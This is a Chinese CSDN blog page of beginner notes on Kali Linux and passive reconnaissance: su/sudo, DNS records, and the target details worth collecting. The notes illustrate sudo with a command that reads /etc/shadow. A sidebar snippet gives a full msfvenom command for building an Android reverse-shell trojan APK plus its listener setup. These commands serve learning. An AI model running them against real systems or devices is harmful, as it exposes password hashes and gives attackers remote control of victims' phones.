记录学习kali linux、网络安全入门过程

已于 2022-08-15 03:12:28 修改
阅读量1.1k 收藏 1
点赞数
文章标签: linux 学习 web安全
于 2022-08-15 01:57:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43953849/article/details/126156688
版权

记录学习kali linux、网络安全入门过程

理论知识

一、基础

1.1 su,sudo

(太久没用了,上手的时候给忘了)
su(switch user):采用login-shell的方式,切换用户后shell中的环境变量也跟着改变了;
sudo(super user do):以root用户的权限执行命令。例如:

tail -n 3 /etc/shadow
sudo !!

就能以获得权限的方式重复第一条输入的命令

二、被动信息收集

2.1 概述

2.1.1 被动信息收集目的
被动信息收集指利用第三方服务对目标进行访问了解,如百度搜索
目的:通过公开渠道获取目标主机信息,避免与目标系统直接交互

2.1.2 信息内容
1.ip地址段
2.域名
3.邮件地址
4.文档图片数据
5.公司地址
6.公司组织架构
7.联系电话
8.姓名/职务
9.目标系统技术架构
10.公开的商业信息

2.1.3 信息用途
物理缺口!

2.2 信息收集-DNS

2.2.1 域名记录

1.A记录(address)正

最低0.47元/天 解锁文章
宝地张家辉
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DNS信息查询 ,子域名爆破工具
m0_49506405的博客
01-17 2451
针对域名进行信息收集 1.使用whois对域名进行查询 如:对sangfor.com.cn 和 sangfor.com.cn域名进行查询 其中有比较重要的电话号,姓名,邮箱,通过查询出的邮箱,可以利用站长之家提供的几个域名反查工具进一步查询; 站长之家: 有发现一些新的域名 securelogin.com.cn gbasic.cn 利用whois进行查看 2.利用nslookup工具进行域名查询(在windows进行命令执行) 在kali中利用dig命令进行查询 查询A类型记录 查询MX类型记录
请求DNS查找的host命令示例
yuyuyuliang00的博客
08-06 869
linux host
dig命令使用详解|使用dig命令挖掘域名解析信息
01-27 7037
dig命令使用详解|使用dig命令挖掘域名解析信息 Dig命令主要用来从 DNS 域名服务器查询主机地址信息 1. 查询域名的A记录 dig qq.com #查询qq.com的A记录 root@xg:~# dig qq.com ; <<>> DiG 9.11.5-P1-1-Debian <<>> qq.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- o.
2024年网络安全最全探索网络安全Kali虚拟机搭配Nmap工具主动扫描_kali安装nmap(1)
最新发布
2401_84266286的博客
05-01 375
Kali Linux是一个基于Debian的渗透测试和网络安全评估的操作系统。它集成了许多常用的渗透测试工具,成为了众多安全专业人员和爱好者的首选。**Nmap(Network Mapper)**是一款开源的网络扫描和主机发现工具。它能够探测活跃主机、开放的端口、操作系统类型和版本等信息,帮助我们发现网络中的漏洞和薄弱环节。
kali su命令 持续使用root权限 问题 su: Authentication failure
jklw4的博客
06-06 2362
kali持续使用root权限su命令报错:authentication failure
KALI网络安全】DNS攻击(劫持和欺骗)与网络钓鱼的模拟和预防(1)
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
03-20 4436
1、DNS概述 关于DNS的定义,作用,分类以及工作原理,我已经在【Windows Server 2019】DNS服务器的配置与管理——理论】这篇博客中陈述过。 要预防DNS劫持,必须了解它的攻击原理和过程 声明 本博客不是在向大家展示这些攻击的方法,而是让大家尽可能的了解DNS攻击的手段以及如何采取必要的预防措施,来确保更安全地上网。 2、DSN劫持(DNS Hijacking)概述 2.1.什么是DNS劫持 DNS劫持全称为域名服务器劫持,又称DNS重定向(DNS redirection)。它是一种
KaliLinux安全渗透教程(完整版)
04-26
9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上破解无线网络 9.7 攻击路由器 9.8 Arpspoof工具
Kali Linux 无线渗透测试入门指南 中文版
11-21
通过学习本教程,读者不仅能够掌握Kali Linux无线渗透测试的基本技巧,还能对无线网络安全有更深入的理解,从而在实际工作中有效地保护无线网络免受攻击。在阅读过程中,结合`kali-linux-wireless-pentest-master`中...
Kali Linux Web 无线渗透测试入门指南 中文版.rar
07-12
介绍:本教程全面讲解如何基于Kali Linux对WiFi无线网络进行渗透测试。教程包括无线网络监听、信息收集、路由器渗透测试、客户端渗透测试四大部分。内容涉及网络扫描、Wireshark抓包分析、WPS/WEP/WPA/WAP+Radius...
kali-linux-08-06-2019.rar
06-03
kali-linux的最小集合安装包,他只包含了必要的组件,轻巧,简约。适合自定义安装。kali-linux安全工作者和黑客的必备工具系统。如果你想成为网络安全工作者,或是想学习黑客知识。它将是你的好伙伴。
Kali使用全部资料
03-28
包含Kali的全套学习资料,可以帮助做渗透分析,网络安全的人提供从入门到精通的全部资源!
Kali 基础命令(一)
君逍遥o
11-27 3156
Kali 基础命令(一)
Kali Linux DNS侦察技术
cg_sss的博客
05-14 702
1.ICMP侦察技术 ping 和 traceroute命令是查找目标基本信息的两个很有用的工具 ping baidu.com traceroute baidu.com 对于某些重要的目标来说这两个命令往往是禁用的,如果过多使用这些服务可能会触发网络安全系统的警报。 ICMP扫射只是简单的发送一个echo请求,然后等待应答。 2.DNS侦察技术 许多重要的目标都会有一个跟应用相关联的DNS名称。 1.DNS调查工具:Dig(域名信息查询工具) dig www.baidu.com 也可.
网络安全kali渗透学习 web渗透入门kali系统的安装和使用。
xueshenlaila的博客
01-14 4599
kali最新系统安装,最新的系统界面和主题迎来了很大的改善,给用户带来了视觉上的焕然一新,其中,这一次更新也打破了以往默认用户为root的方式; 底部有已经安装好的,下载之后,请到我主页找到修改密码的文章 希望这篇文章能够帮助所有刚刚入门准备学网安的人们能够成功安装kali系统 以下有视频版还有文字版 不知道怎么下载kali系统的请看文字版的,里面含有下载好的kali系统 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/黑客防御/kali渗透测试/wbe安全-小白入门到精通 全套10000集大
网络攻防——kali操作系统基本使用
热门推荐
weixin_46560512的博客
03-07 2万+
主要介绍如何搭建kali虚拟机,然后介绍了一个简单的攻击方法,切记,网络恶意攻击属于违法行为
网络安全KALI使用
小啊宇的博客
01-15 8363
合理学习技术,切勿犯罪 1.先查看本机kali的IP地址,使用命令ifocnfig 2:在终端输入msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 来生成木马程序 提示这就是成功了! 然后输入命令:msfconsole来启动监听,启动时间有点长稍微等一会。 启动成功后就是这个样子 然后使用命令use exploit/multi/handler 加载模块 输入命令:s.
kali系统——网络安全v6笔记总结(一)
weixin_33901843的博客
04-11 619
kali:(Kali Linux)是一个***测试,安全审计(Security Auditing)平台,继承了多款漏洞检测,安全扫描,漏洞利用等安全工具。基于Linux操作系统——Debian,前身为Back Track(回溯)BT5.官网https://www.kali.org。 以下内容摘自网络(kali安全专家手头的重要工具,在一个实用的工具包里尽可能多的包含和审计工具。Kali 实现了这...
基于树莓派Kali Linux渗透测试基础教程,网络安全,计算机,黑客教程
03-13
Kali Linux,作为一个专门用于渗透测试和网络安全审计的操作系统,与树莓派的结合为安全专业人员提供了一种便携式的渗透测试平台。 在学习这门教程时,你需要准备一台树莓派2 Model B,一张预装了Kali Linux 2.0.1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值